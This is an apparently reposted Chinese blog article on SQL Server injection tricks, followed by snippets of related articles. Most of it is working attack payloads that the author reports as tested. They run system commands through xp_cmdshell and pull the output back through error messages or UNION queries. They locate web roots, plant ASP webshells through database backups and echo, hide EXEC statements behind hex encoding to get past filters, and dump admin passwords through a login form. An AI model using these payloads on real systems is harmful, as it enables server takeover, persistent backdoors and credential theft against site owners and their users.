SQLServer注入技巧

最新推荐文章于 2024-02-20 06:03:37 发布
最新推荐文章于 2024-02-20 06:03:37 发布
阅读量476 收藏
点赞数
文章标签: sql server

A权限执行命令,如何更快捷的获取结果?

有显示位

显示位

其实这里的关键并不是有无显示位。exec master..xp_cmdshell 'systeminfo'生成的数据写进一张表的时候,会产生很多行。而我们要做的就是如何很多行通过显示位、或者报错语句一次性爆出来,这里的关键就是多行合一。

方法①

01      
02 BEGIN
03      IF EXISTS(select table_name from information_schema.tables where table_name='test_1')drop table test_1;
04      IF EXISTS(select table_name from information_schema.tables where table_name='test_2')drop table test_2;
05      create TABLE test_1([output][varchar](1000));
06      insert test_1 exec master.dbo.xp_cmdshell 'ipconfig /all';
07      DECLARE @result varchar(8000)
08      SET @result='~'
09      SELECT @result=@result+' '+output from test_1 where output>' '
10      SELECT @result AS result INTO test_2;
11      SELECT convert(int,(select result from test_2));
12 END;

解析:
这里6-9句的意思是申明一个@result的临时变量;
设置初始值为’~’;将test_1中的数据数据依次取出来,迭代条件是output>’ ‘,并组合成新的字符串,字符串之间用空格隔开最后复制给@result;
然后将@result设置一个别名,然后插入test_2中。
最后报错回显
PS:
mssql英文字母比较大小不区分大小写
mssql字符串比较大小和C语言中的str_cmp()一样的道理

方法②(注入点测试成功、测试平台SQL Server2008- 10.0.1600.22 (X64)

1 报错:AND (SELECT FROM test_1 FOR XML PATH(''))=1--
2 显示:UNION SELECT 1,(SELECT FROM test_1 FOR XML PATH(''))--

二、如何快速寻找网站目录(SA用户)

SA用户被降权

SA用户未被降权

这里区分降权与非降权是有道理的,如果没有被降权。那么权限很高就可以读取某些保存在本机的配置了,如果权限低一点的话,可以使用dir命令查找。

方法①(被降权:–亲测成功):

1 CREATE TABLE test_1([output][varchar](1000));
2 INSERT test_1 EXEC master.dbo.xp_cmdshell 'dir /s d:\web.config ';
3 AND (SELECT FROM test_1 FOR XML PATH(''))=1;

方法②(未被降权–system–亲测成功):

1 CREATE TABLE test_1([output][varchar](1000));
2 INSERT test_1 EXEC master.dbo.xp_cmdshell 'cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root ';
3 AND (SELECT FROM test_1 FOR XML PATH(''))=1;

方法③(sa+system权限+IIS7.0+IIS7.5):

%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表

%systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径

PS: %systemroot%代表c:\windows\

三、如何利用注入点getshell

方法①(差异备份)–客户端亲测成功–并未要求权限,可以在非sa权限的注入点测试

1 IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;
2 backup database XFData to disk = 'D:\WebRoot\asp.bak';
3 create table [dbo].[test_tmp] ([cmd] [image]);
4 insert into  test_tmp(cmd) values(0x3C25657865637574652872657175657374282261222929253E);
5 backup database XFData to disk='D:\WebRoot\asp.asp' WITH DIFFERENTIAL,FORMAT;

方法②(减小体积)–客户端亲测成功–并未要求权限,可以在非sa权限的注入点测试

1 IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;
2 alter database XFData set RECOVERY FULL;
3 create table  test_tmp  (a image);
4 backup log XFData to disk = 'D:\WebRoot\asp.bak' with init;
5 insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);
6 backup log XFData to disk = 'D:\webroot\123.asp'

PS:
如果不能备份,很有可能是访问权限的问题。可以切换目录尝试
如果表存在,也不能成功;所以先判断表是否存在,如果存在就删除。

方法③(echo 输出一句话木马)–sa权限+当前用户写权限–亲测成功

1 echo ^<%eval request("pass")%^> >D:\%D1%A7%B7%D6%CF%B5%CD%B3\WebRoot\update.asp

PS:这里由于是注入点,因此需要注意编码的问题。一般来说,网页的编码和数据库的编码是一致的(如果不一致~~~算我输)。这里我用了一个中文路径做说明。

四、如何避免使用select之类的关键字

方法①:十六进制混淆

1 ;DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

五、登录点的注入如何最快获取后台密码

01 1' HAVING 1=1-- #爆出表名
02   
03 1' GROUP BY username HAVING 1=1--  # 爆出字段名
04   
05 # User_Mess.Account
06   
07 # User_Mess.PWD
08   
09 1';select/**/convert(int,(select/**/top/**/1/**/Account/**/from/**/User_Mess))--                                                          
10 1';select/**/convert(int,(select/**/top/**/1/**/PWD/**/from/**/User_Mess/**/where/**/Account='admin'))--

六、结语

这篇文章是很久以前整理的,有些地方可能有不对之处,希望大家能够指出。

原文地址:http://ecma.io/?p=356

byboss
关注
Sql serversql注入
12-14
SQL Injection   关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下   防范sql注入的方法无非有以下几种:   1.使用类型安全的SQL参数   2.使用参数化输入存储过程   3.使用参数集合与动态SQL   4.输入滤波   5.过滤LIKE条款的特殊字符   …如果有遗漏的也欢迎园子的大大们指教。   Sample:   var Shipcity;   ShipCity = Request.form ("ShipCity");   var sql = "select * from
SQL Server注入大全及防御
09-04
#### 二、SQL Server注入技巧详解 ##### 1. 基于错误的SQL注入 当Web应用程序返回SQL错误消息时,攻击者可以通过观察这些错误信息来推断数据库结构和表名等信息,进而构造更复杂的SQL语句进行进一步攻击。例如: ...
桂林老兵的SQLSERVER高级注入技巧
12-13 1088
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值
关于SQL注入的一些技巧分享
weixin_30345577的博客
12-29 170
先上一道简单的ctf注入题: 一道利用order by进行注入的ctf题 很不错的一道利用order by的注入题,之前不知道order by除了爆字段还有这种操作。 原题地址:http://chall.tasteless.eu/level1/index.php?dir= 直接进去dir后的参数是ASC,网页上有从1~10编号的10条信息。绕了一大圈反应出是order by后...
发现sql注入的一些技巧
没有绝对的安全
05-07 1523
1.如果一个’导致错误,试着查看\’能否成功(因为反斜杠在MySQL中取消了单引号)2.你也可以尝试注释掉,--',看页面返回是否正常。3.如果正常的输入只是一个整数,你可以尝试减去一些量,然后查看减法是否有效( id=460-5 )。4.试着看偶数的引号是否会返回成功(例如460''或460-'')并且奇数的引号会导致错误(460' 或460-''')。5.延时注入绕过防火墙:找到真实ip,修改...
SQL Server精华技巧
01-21
本文将深入探讨SQL Server的一些精华技巧,帮助用户提升数据库管理和开发的效率。 一、SQL查询优化 1. 使用索引:索引是提高查询速度的关键。合理创建主键、唯一索引和非聚集索引,可以大幅减少数据扫描的时间。但...
SqlServer参数化查询之where in和like实现详解
12-15
SQL Server中,参数化查询是一种安全且高效的执行SQL的方式,它可以有效防止SQL注入,并在大量数据查询时提高性能。本文主要讨论如何实现`WHERE IN`和`LIKE`的参数化查询,这两种操作在数据库查询中非常常见,尤其...
c# sqlserver2008 简单的SQL注入演示
07-31
在IT行业中,SQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意的SQL代码来...对于使用C#和SQL Server 2008的开发者来说,掌握这些技巧尤为重要,因为它们能帮助我们在开发过程中构建更健壮、更安全的应用程序。
SQL注入的新技巧
zgqtxwd的专栏
04-26 259
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
利用Nmap对MS-SQLSERVER进行渗透
Fly_鹏程万里
12-17 917
如今Nmap的脚本引擎从一个普通的端口扫描器转变为具有攻击性的渗透测试工具 。随着nmap各种脚本的存在。到目前为止,我们甚至可以进行完整的SQL数据库渗透而不需要任何其他的工具。 在本教程中,我们将看到在这些脚本中有些什么样的信息,以及如何通过Nmap从数据库中提取,还可以利用SQLServer来执行系统命令。 默认MS-SQL数据库上运行的端口为1433,为了及时发现有关数据库,我们需要执...
SQL Server手工注入方式
内心不种满鲜花就会长满杂草
01-04 6070
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQLSERVER高级注入技巧
Priate
03-08 626
   [获取全部数据库名] select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库 [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] select top 1 name from 数据库名.dbo.sysobjects where xtype=’u’ and statu
WEB安全之:SQL Server 数据库 SQL 注入
f_carey的博客
06-09 1149
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL Server 数据库1 SQL Server 数据库 SQL 注入基础知识1.1 SQL Server 三个权限级别:1.2 SQL Server 数据库的 6 个默认库1.3 注释符号1.4 SQL Server 注入常用语句及函数1.5 SQL Server 中的 `INFORMATION_SCH.
SQL注入语法
走在成功路上的博客
09-09 1702
SQL注入语法前言基本语法讲解 前言 这里就不过多的说一些基本的数据库常识及增删改查了,主要针对注入的一些语句及转义语法的讲解 这个文章也会根据自身不断收集不断地更新..... 基本语法讲解 ORDER BY Tips: 升序及降序知识点 默认是升序排列 降序语法:DESC SELECT * FROM database.table ORDER BY listname DESC; /...
SQLServer数据库注入测试
Jietewang的博客
04-11 1059
Part one:How phpstudy connects to SQL Server 2008 总结一下:使用PHPstudy集成环境中的php5.4.45连接SQL server 2008相关坑点。 在百度上能搜索到的大部份方法都是有效的,但是如果你是一个运气不太好的新手的话估计就要耗费你太多的精力。 首先需要明白的是Windows下的安装的PHPstudy集成环境是不能直接使用PHP连接数据库SQL Server 2008。这本身就是一个很恼火的事情,随着时代的进步,科技的发展,现在的人儿啊尽
sqlserver注入
最新发布
qq_49714982的博客
02-20 1387
cmd登录mssql:osql -S 127.0.0.1 -U sa -P 134679258qaZ@使用数据库:use test查询语句:select * from users查询所有数据库:select name from sysdatabases查看当前数据库所有的表:select name from sysobjects。
SQL Server高级注入技巧详解:攻击手段与防护策略
本文档深入探讨了基于Microsoft SQL Server应用的高级SQL注入技术,针对流行的IIS/ASP平台,着重剖析了如何利用此类漏洞对网络应用程序和数据库进行攻击。内容涵盖了以下几个关键部分: 1. **简介**:SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值